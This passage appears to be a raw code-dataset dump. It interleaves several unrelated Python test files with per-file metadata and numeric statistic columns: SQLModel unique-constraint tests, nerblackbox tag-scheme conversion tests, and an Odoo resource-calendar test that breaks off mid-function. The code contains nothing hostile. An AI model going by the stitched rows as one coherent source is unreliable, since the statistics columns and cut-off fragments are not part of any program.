b"\x3d\x4e\xb0\x59\xb2\xa7\xab\x2d\xac\xd1\xaf\xae\x77\x12\xd3\x30\x97\x28\xd5\xe7\x88\x34\x35\x10\x66\x45\x52\x5f\xea\xfb\x02\x9b" + \
b"\x75\x5c\x77\x67\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x81\x81\x00\xd6\x2c\x88\x43" + \
b"\x42\x2a\x0c\x8b\x1c\xd4\xe9\xd1\x16\xd5\x4b\xd3\x00\x5e\xeb\xa3\xdb\x21\x2c\x35\xb5\xbb\xa7\xc8\xb9\x58\x51\x34\x5b\x91\xf7\xc3" + \
b"\x17\x20\x6b\x18\x4d\x5f\x13\x42\x60\x17\x6e\x09\x82\x50\x55\x45\xd9\x6a\x74\xf5\xa9\x10\x3d\x2e\xf1\x16\xad\xa5\x0d\x25\xe7\x06" + \
b"\x22\x0e\x82\xae\x76\x80\x85\x3d\x0a\x3b\x20\x01\xc9\x42\xdd\x19\xfe\x1b\xda\x5d\x6d\x1b\xd7\x0d\x10\x39\x74\x97\xd7\x36\x8c\x1a" + \
b"\x56\x28\x98\x13\xaa\x35\xe7\xa4\xa0\xdd\x60\xba\xed\xca\x4e\xda\x57\x3b\xdf\xd7\xb8\xa7\x9f\xf1\x75\xa6\xbf\x0a"]
| 140.219512
| 149
| 0.658027
| 1,284
| 5,749
| 2.944704
| 0.191589
| 0.012695
| 0.011902
| 0.015869
| 0.461783
| 0.461783
| 0.461783
| 0.456229
| 0.418143
| 0.403861
| 0
| 0.331982
| 0.0988
| 5,749
| 40
| 150
| 143.725
| 0.3978
| 0
| 0
| 0
| 0
| 0.975
| 0.862063
| 0.860671
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65ad0d9b5616e984d3c65175f2fbb391df663ea0
| 2,844
|
py
|
Python
|
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | 3
|
2021-11-10T14:39:22.000Z
|
2021-12-13T16:01:48.000Z
|
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | null | null | null |
import pytest
from typing import Optional
from sqlmodel import Field, Session, SQLModel, create_engine
from sqlalchemy.exc import IntegrityError
def test_should_allow_duplicate_row_if_unique_constraint_is_not_passed(clear_sqlmodel):
class Hero(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
secret_name: str
age: Optional[int] = None
hero_1 = Hero(name="Deadpond", secret_name="Dive Wilson")
hero_2 = Hero(name="Deadpond", secret_name="Dive Wilson")
engine = create_engine("sqlite://")
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
session.add(hero_1)
session.commit()
session.refresh(hero_1)
with Session(engine) as session:
session.add(hero_2)
session.commit()
session.refresh(hero_2)
with Session(engine) as session:
heroes = session.query(Hero).all()
assert len(heroes) == 2
assert heroes[0].name == heroes[1].name
def test_should_allow_duplicate_row_if_unique_constraint_is_false(clear_sqlmodel):
    """An explicit ``unique=False`` behaves exactly like omitting the
    constraint: duplicate rows are accepted."""
    class Hero(SQLModel, table=True):
        id: Optional[int] = Field(default=None, primary_key=True)
        name: str
        secret_name: str = Field(unique=False)
        age: Optional[int] = None

    duplicates = [
        Hero(name="Deadpond", secret_name="Dive Wilson"),
        Hero(name="Deadpond", secret_name="Dive Wilson"),
    ]
    engine = create_engine("sqlite://")
    SQLModel.metadata.create_all(engine)
    # Each insert happens in a separate session, as in the un-constrained case.
    for hero in duplicates:
        with Session(engine) as session:
            session.add(hero)
            session.commit()
            session.refresh(hero)
    with Session(engine) as session:
        stored = session.query(Hero).all()
        assert len(stored) == 2
        assert stored[0].name == stored[1].name
def test_should_raise_exception_when_try_to_duplicate_row_if_unique_constraint_is_true(clear_sqlmodel):
    """Inserting a second row with the same ``secret_name`` must trip the
    database-level UNIQUE constraint and surface as IntegrityError."""
    class Hero(SQLModel, table=True):
        id: Optional[int] = Field(default=None, primary_key=True)
        name: str
        secret_name: str = Field(unique=True)
        age: Optional[int] = None

    original = Hero(name="Deadpond", secret_name="Dive Wilson")
    duplicate = Hero(name="Deadpond", secret_name="Dive Wilson")
    engine = create_engine("sqlite://")
    SQLModel.metadata.create_all(engine)
    with Session(engine) as session:
        session.add(original)
        session.commit()
        session.refresh(original)
    # The commit of the duplicate violates UNIQUE(secret_name).
    with pytest.raises(IntegrityError):
        with Session(engine) as session:
            session.add(duplicate)
            session.commit()
            session.refresh(duplicate)
| 30.913043
| 104
| 0.647328
| 355
| 2,844
| 4.983099
| 0.183099
| 0.050876
| 0.07688
| 0.085924
| 0.887507
| 0.887507
| 0.869418
| 0.869418
| 0.869418
| 0.869418
| 0
| 0.011225
| 0.248242
| 2,844
| 91
| 105
| 31.252747
| 0.816183
| 0
| 0
| 0.835821
| 0
| 0
| 0.051217
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 1
| 0.044776
| false
| 0.014925
| 0.059701
| 0
| 0.328358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
029c87349f383916286697d2d9ecb30bf50c1e34
| 9,849
|
py
|
Python
|
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from typing import List
from nerblackbox.modules.ner_training.annotation_tags.tags import Tags
########################################################################################################################
########################################################################################################################
########################################################################################################################
class TestTags:
    """Parametrized tests for ``Tags``: conversion between annotation
    schemes (plain / bio / bilou) and restoration of annotation-scheme
    consistency. Expected ``output_sequence = None`` means the call is
    expected to raise."""
    ####################################################################################################################
    ####################################################################################################################
    ####################################################################################################################
    @pytest.mark.parametrize(
        "source_scheme, " "input_sequence, " "target_scheme, " "output_sequence",
        [
            # 1. plain -> plain
            (
                "plain",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "plain",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
            ),
            # 2. plain -> bio
            (
                "plain",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            # 3. plain -> bilou
            (
                "plain",
                ["O", "A", "A", "A", "O", "O", "O", "B", "O"],
                "bilou",
                ["O", "B-A", "I-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            # 4. bio -> plain
            (
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "plain",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
            ),
            # 5. bio -> bio
            (
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            (
                "bio",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                "bio",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                # ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            (
                "bio",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                "bio",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                # ["B-B", "B-A", "B-A", "O", "O", "B-A", "B-B", "O"],
            ),
            # 6. bio -> bilou
            (
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            # 7. bilou -> plain
            (
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
                "plain",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
            ),
            # 8. bilou -> bio
            (
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            # 9. bilou -> bilou
            (
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            (
                "bilou",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                "bilou",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                # ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            (
                "bilou",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                "bilou",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                # ["U-B", "U-A", "U-A", "O", "O", "U-A", "U-B", "O"],
            ),
            (
                "bilou",
                ["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
                "bilou",
                ["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
                # ["B-A", "I-A", "L-A", "O", "O", "U-A", "U-B", "O"],
            ),
            # 10. unknown input scheme
            (
                "xyz",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "bio",
                None,
            ),
            # 11. wrong input scheme
            (
                "plain",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "bio",
                None,
            ),
            (
                "bio",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "bio",
                None,
            ),
            (
                "bilou",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "bio",
                None,
            ),
            # 12. incorrect tag format
            (
                "bio",
                ["O", "B-A", "L-A", "O", "O", "O", "B-B", "O"],
                "bio",
                None,
            ),
        ],
    )
    def test_convert_scheme(
        self,
        source_scheme: str,
        input_sequence: List[str],
        target_scheme: str,
        output_sequence: List[str],
    ) -> None:
        """Convert *input_sequence* from *source_scheme* to *target_scheme*.

        When *output_sequence* is None, the conversion is expected to raise
        (unknown scheme, sequence inconsistent with the declared scheme, or
        malformed tag).
        """
        if output_sequence is not None:
            test_output_sequence = Tags(input_sequence).convert_scheme(
                source_scheme, target_scheme
            )
            assert (
                test_output_sequence == output_sequence
            ), f"{test_output_sequence} != {output_sequence}"
        else:
            # Invalid input: any Exception raised by convert_scheme is accepted.
            with pytest.raises(Exception):
                Tags(input_sequence).convert_scheme(source_scheme, target_scheme)
    ####################################################################################################################
    ####################################################################################################################
    ####################################################################################################################
    @pytest.mark.parametrize(
        "source_scheme, " "input_sequence, " "target_scheme, " "output_sequence",
        [
            # 5. bio -> bio
            (
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            (
                "bio",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                "bio",
                # ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
            ),
            (
                "bio",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                "bio",
                # ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                ["B-B", "B-A", "B-A", "O", "O", "B-A", "B-B", "O"],
            ),
            # 9. bilou -> bilou
            (
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
                "bilou",
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            (
                "bilou",
                ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                "bilou",
                # ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
                ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
            ),
            (
                "bilou",
                ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                "bilou",
                # ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
                ["U-B", "U-A", "U-A", "O", "O", "U-A", "U-B", "O"],
            ),
            (
                "bilou",
                ["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
                "bilou",
                # ["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
                ["B-A", "I-A", "L-A", "O", "O", "U-A", "U-B", "O"],
            ),
            # 11. wrong input scheme
            (
                "bio",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "bio",
                None,
            ),
            (
                "bilou",
                ["O", "A", "A", "O", "O", "O", "B", "O"],
                "bio",
                None,
            ),
            # 12. incorrect tag format
            (
                "bio",
                ["O", "B-A", "L-A", "O", "O", "O", "B-B", "O"],
                "bio",
                None,
            ),
            # 13. unknown output scheme
            (
                "bio",
                ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
                "xyz",
                None,
            ),
        ],
    )
    def test_restore_annotation_scheme_consistency(
        self,
        source_scheme: str,
        input_sequence: List[str],
        target_scheme: str,
        output_sequence: List[str],
    ) -> None:
        """Repair *input_sequence* so it is consistent with *target_scheme*.

        Unlike convert_scheme, inconsistent prefixes (e.g. a dangling I- tag)
        are rewritten rather than rejected. When *output_sequence* is None,
        the call is expected to raise. Only the first element of the returned
        tuple (the repaired sequence) is checked.
        """
        if output_sequence is not None:
            test_output_sequence = Tags(
                input_sequence
            ).restore_annotation_scheme_consistency(target_scheme)[0]
            assert (
                test_output_sequence == output_sequence
            ), f"{test_output_sequence} != {output_sequence}"
        else:
            # Invalid input or unknown target scheme: any Exception is accepted.
            with pytest.raises(Exception):
                Tags(input_sequence).restore_annotation_scheme_consistency(
                    target_scheme
                )
| 36.343173
| 120
| 0.225201
| 975
| 9,849
| 2.213333
| 0.068718
| 0.100093
| 0.084801
| 0.079703
| 0.8443
| 0.8443
| 0.841983
| 0.83874
| 0.83874
| 0.745598
| 0
| 0.004331
| 0.437303
| 9,849
| 270
| 121
| 36.477778
| 0.38506
| 0.084476
| 0
| 0.76087
| 0
| 0
| 0.145216
| 0.005546
| 0
| 0
| 0
| 0
| 0.008696
| 1
| 0.008696
| false
| 0
| 0.013043
| 0
| 0.026087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
02e939c75b6efc55606337c240a9fc991c22e34e
| 34,045
|
py
|
Python
|
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | null | null | null |
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | null | null | null |
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | 3
|
2020-10-08T14:42:10.000Z
|
2022-01-28T14:12:29.000Z
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2013-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp.addons.resource.tests.common import TestResourceCommon
class TestResource(TestResourceCommon):
    def test_00_intervals(self):
        """ Testing the raw interval helpers of resource.calendar:
        interval_clean (merge overlapping intervals), interval_remove_leaves
        (subtract leave intervals from a working interval) and
        interval_schedule_hours (allocate a number of hours over intervals,
        forwards or backwards). """
        intervals = [
            (
                datetime.strptime('2013-02-04 09:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-04 11:00:00', '%Y-%m-%d %H:%M:%S')
            ), (
                datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-04 12:00:00', '%Y-%m-%d %H:%M:%S')
            ), (
                datetime.strptime('2013-02-04 11:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S')
            ), (
                datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S')
            ), (
                datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S')
            ), (
                datetime.strptime('2013-02-04 18:00:00', '%Y-%m-%d %H:%M:%S'),
                datetime.strptime('2013-02-04 19:00:00', '%Y-%m-%d %H:%M:%S')
            )
        ]
        # Test: interval cleaning (overlapping/contained intervals are merged)
        cleaned_intervals = self.resource_calendar.interval_clean(intervals)
        self.assertEqual(len(cleaned_intervals), 3, 'resource_calendar: wrong interval cleaning')
        # First interval: 03, unchanged
        self.assertEqual(cleaned_intervals[0][0], datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        self.assertEqual(cleaned_intervals[0][1], datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        # Second interval: 04, 08-14, combining 08-12 and 11-14, 09-11 being inside 08-12
        self.assertEqual(cleaned_intervals[1][0], datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        self.assertEqual(cleaned_intervals[1][1], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        # Third interval: 04, 17-21, 18-19 being inside 17-21
        self.assertEqual(cleaned_intervals[2][0], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        self.assertEqual(cleaned_intervals[2][1], datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
        # Test: disjoint removal (subtract all leave intervals from 04 08-18)
        working_interval = (datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), datetime.strptime('2013-02-04 18:00:00', '%Y-%m-%d %H:%M:%S'))
        result = self.resource_calendar.interval_remove_leaves(working_interval, intervals)
        self.assertEqual(len(result), 1, 'resource_calendar: wrong leave removal from interval')
        # First interval: 04, 14-17
        self.assertEqual(result[0][0], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        self.assertEqual(result[0][1], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        # Test: schedule 5.5 hours forwards over the cleaned intervals
        result = self.resource_calendar.interval_schedule_hours(cleaned_intervals, 5.5)
        self.assertEqual(len(result), 2, 'resource_calendar: wrong hours scheduling in interval')
        # First interval: 03, 8-10 untouched (2 hours)
        self.assertEqual(result[0][0], datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        self.assertEqual(result[0][1], datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        # Second interval: 04, 08-11:30 (remaining 3.5 hours)
        self.assertEqual(result[1][0], datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        self.assertEqual(result[1][1], datetime.strptime('2013-02-04 11:30:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        # Test: schedule hours on intervals, backwards (remove_at_end=False)
        cleaned_intervals.reverse()
        result = self.resource_calendar.interval_schedule_hours(cleaned_intervals, 5.5, remove_at_end=False)
        self.assertEqual(len(result), 2, 'resource_calendar: wrong hours scheduling in interval')
        # First interval (backwards): 04, 17-21 kept in full (4 hours)
        self.assertEqual(result[0][0], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        self.assertEqual(result[0][1], datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        # Second interval (backwards): 04, 12:30-14:00 (remaining 1.5 hours, trimmed at the start)
        self.assertEqual(result[1][0], datetime.strptime('2013-02-04 12:30:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
        self.assertEqual(result[1][1], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
    def test_10_calendar_basics(self):
        """ Testing basic methods of resource.calendar: get_next_day,
        get_previous_day, get_weekdays and get_attendances_for_weekdays.
        Relies on self.date1 / self.date2 and the calendar set up in
        TestResourceCommon (day1 and day4 are the calendar's working days). """
        cr, uid = self.cr, self.uid
        # --------------------------------------------------
        # Test1: get_next_day
        # --------------------------------------------------
        # Test: next day: next day after day1 is day4
        date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date1.date())
        self.assertEqual(date, self.date2.date(), 'resource_calendar: wrong next day computing')
        # Test: next day: next day after day4 is (day1+7)
        date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date2.date())
        self.assertEqual(date, self.date1.date() + relativedelta(days=7), 'resource_calendar: wrong next day computing')
        # Test: next day: next day after day4+1 is (day1+7)
        date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date2.date() + relativedelta(days=1))
        self.assertEqual(date, self.date1.date() + relativedelta(days=7), 'resource_calendar: wrong next day computing')
        # Test: next day: next day after day1-1 is day1
        date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date1.date() + relativedelta(days=-1))
        self.assertEqual(date, self.date1.date(), 'resource_calendar: wrong next day computing')
        # --------------------------------------------------
        # Test2: get_previous_day
        # --------------------------------------------------
        # Test: previous day: previous day before day1 is (day4-7)
        date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date1.date())
        self.assertEqual(date, self.date2.date() + relativedelta(days=-7), 'resource_calendar: wrong previous day computing')
        # Test: previous day: previous day before day4 is day1
        date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date2.date())
        self.assertEqual(date, self.date1.date(), 'resource_calendar: wrong previous day computing')
        # Test: previous day: previous day before day4+1 is day4
        date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date2.date() + relativedelta(days=1))
        self.assertEqual(date, self.date2.date(), 'resource_calendar: wrong previous day computing')
        # Test: previous day: previous day before day1-1 is (day4-7)
        date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date1.date() + relativedelta(days=-1))
        self.assertEqual(date, self.date2.date() + relativedelta(days=-7), 'resource_calendar: wrong previous day computing')
        # --------------------------------------------------
        # Test3: misc
        # --------------------------------------------------
        # Weekdays covered by the calendar's attendances (1=Tuesday, 4=Friday)
        weekdays = self.resource_calendar.get_weekdays(cr, uid, self.calendar_id)
        self.assertEqual(weekdays, [1, 4], 'resource_calendar: wrong weekdays computing')
        # Only attendances whose dayofweek falls in [2, 3, 4, 5] are kept
        attendances = self.resource_calendar.get_attendances_for_weekdays(cr, uid, self.calendar_id, [2, 3, 4, 5])
        self.assertEqual(set([att.id for att in attendances]), set([self.att2_id, self.att3_id]),
                         'resource_calendar: wrong attendances filtering by weekdays computing')
    def test_20_calendar_working_intervals(self):
        """ Testing working intervals computing method of resource.calendar
        (get_working_intervals_of_day), with and without leave computation. """
        cr, uid = self.cr, self.uid
        context = self.context
        _format = '%Y-%m-%d %H:%M:%S'
        # Test: day0 without leaves: 1 interval, starting at the given start_dt
        intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1, context=context)
        self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 09:08:07', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working intervals')
        # Test: day3 without leaves: 2 intervals (morning and evening attendance)
        intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date2, context=context)
        self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-15 10:11:12', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-15 13:00:00', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[1][0], datetime.strptime('2013-02-15 16:00:00', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[1][1], datetime.strptime('2013-02-15 23:00:00', _format), 'resource_calendar: wrong working intervals')
        # Test: day0 with leaves outside range: still 1 interval
        intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=0), compute_leaves=True, context=context)
        self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 08:00:00', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working intervals')
        # Test: day0 with leaves: 2 intervals because of leave between 9 and 12, ending at 15:45:30
        intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id,
                                                                        start_dt=self.date1.replace(hour=8) + relativedelta(days=7),
                                                                        end_dt=self.date1.replace(hour=15, minute=45, second=30) + relativedelta(days=7),
                                                                        compute_leaves=True, context=context)
        self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:08:07', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 09:00:00', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[1][0], datetime.strptime('2013-02-19 12:00:00', _format), 'resource_calendar: wrong working intervals')
        self.assertEqual(intervals[1][1], datetime.strptime('2013-02-19 15:45:30', _format), 'resource_calendar: wrong working intervals')
    def test_30_calendar_working_days(self):
        """ Testing calendar hours computation on a working day:
        get_working_intervals_of_day with/without leave computation
        (generic and per-resource) and get_working_hours_of_date. """
        cr, uid = self.cr, self.uid
        context = self.context
        _format = '%Y-%m-%d %H:%M:%S'
        # Test: day1, beginning at 10:30 -> work from 10:30 (arrival) until 16:00
        intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=10, minute=30, second=0), context=context)
        self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 10:30:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        # Test: hour computation for same interval, should give 5.5
        wh = self.resource_calendar.get_working_hours_of_date(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=10, minute=30, second=0), context=context)
        self.assertEqual(wh, 5.5, 'resource_calendar: wrong working interval / day time computing')
        # Test: day1+7 on leave, without leave computation -> leave is ignored
        intervals = self.resource_calendar.get_working_intervals_of_day(
            cr, uid, self.calendar_id,
            start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=7), context=context
        )
        # Result: day1 (08->16)
        self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval/day computing')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        # Test: day1+7 on leave, with generic leave computation -> leave splits the day
        intervals = self.resource_calendar.get_working_intervals_of_day(
            cr, uid, self.calendar_id,
            start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=7),
            compute_leaves=True, context=context
        )
